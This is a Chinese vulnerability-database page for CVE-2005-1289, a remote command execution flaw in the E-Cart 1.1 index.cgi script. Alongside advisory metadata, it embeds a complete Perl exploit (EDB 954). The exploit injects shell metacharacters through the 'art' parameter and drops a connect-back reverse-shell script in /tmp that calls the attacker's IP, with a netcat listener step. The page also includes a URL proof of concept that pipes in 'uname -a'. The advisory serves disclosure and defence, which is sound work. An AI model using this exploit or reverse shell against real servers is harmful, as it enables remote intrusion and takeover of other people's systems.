CVE-2005-1289
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:18:36
NMCOES    

[原文]index.cgi in E-Cart 2004 1.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) art and possibly (2) cat parameters.


[CNNVD]PixySoft E-Cart Cat远程命令执行漏洞(CNNVD-200505-222)

        E-Cart 2004 1.1以及较早版本中的index.cgi允许远程攻击者通过(1)art以及或者(2)cat参数中的shell元字符来执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1289
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1289
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-222
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111428818425864&w=2
(UNKNOWN)  BUGTRAQ  20050423 E-Cart v1.1 Remote Command Execution
http://securitytracker.com/id?1013780
(UNKNOWN)  SECTRACK  1013780

- 漏洞信息

PixySoft E-Cart Cat远程命令执行漏洞
高危 输入验证
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        E-Cart 2004 1.1以及较早版本中的index.cgi允许远程攻击者通过(1)art以及或者(2)cat参数中的shell元字符来执行任意命令。

- 公告与补丁

        暂无数据

- 漏洞信息 (954)

E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit (EDBID:954)
cgi webapps
2005-04-25 Verified
0 z
N/A [点击下载]
#!/usr/bin/perl
#
# Example added if code doesn't work for ya:
# http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
# /str0ke
#
#
# info: emanuele@orvietolug.org
#
use IO::Socket; 

print "\n\n ~~ www.badroot.org ~~ \n\n";
print " E-Cart E-Commerce Software index.cgi\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <= E-Cart 2004 v1.1\n";
print " http://www.securityfocus.com/archive/1/396748/2005-04-20/2005-04-26/0  \n\n";
print " ~~ code by z\\ ~~\n\n\n";
print " 04.23.2005\n\n\n";


print "hostname: \n"; 
chomp($server=<STDIN>);  

print "port: (default: 80)\n";
chomp($port=<STDIN>);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );

print "path: (/cgi-bin/ecart/)\n";
chomp($path=<STDIN>);

print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>);

print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>);


print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";

print "[*] try to exploiting...\n"; 

$string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";

print "[*] OK! \n"; 
print "[*] NOW, run in your box: nc -l -vv -p $reverse\n";
print "[*] starting connect back on $ip :$reverse\n";
print "[*] DONE!\n";
print "[*] Loock netcat windows and funny\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp) 
or die; 


print $socket "POST $path HTTP/1.1\n"; 
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: 7330ecart\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING   \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu us.ircnet.org\n\n\n";


# milw0rm.com [2005-04-25]
		

- 漏洞信息

15738
E-Cart 2004 index.cgi art Parameter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

E-Cart 2004 contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the 'art' parameter in the 'index.cgi' script not being properly sanitized and may allow a remote attacker to execute arbitrary commands via shell metacharacters resulting in a loss of integrity.

- 时间线

2005-04-23 Unknow
2005-04-23 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
Input Validation Error 13321
Yes No
2005-04-22 12:00:00 2009-07-12 02:06:00
Discovery is credited to Inaki Cormenzana.

- 受影响的程序版本

PixySoft E-Cart 1.1

- 漏洞讨论

PixySoft E-Cart is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.

Specifically, the user-specified 'art' URI parameter is supplied to a Perl open() routine.

PixySoft E-Cart versions 1.1 is reported vulnerable to this issue.

- 漏洞利用

An exploit is not required.

The following proof of concept is available:
http://www.example.com/DIRTOECART/index.cgi?action=viewart&amp;cat=reproductores_dvd&amp;art=reproductordvp-ns315.dat|uname%20-a|

SoulBlack has provided the following exploit:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php

The following script has been provided that supplies a connect back shell:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站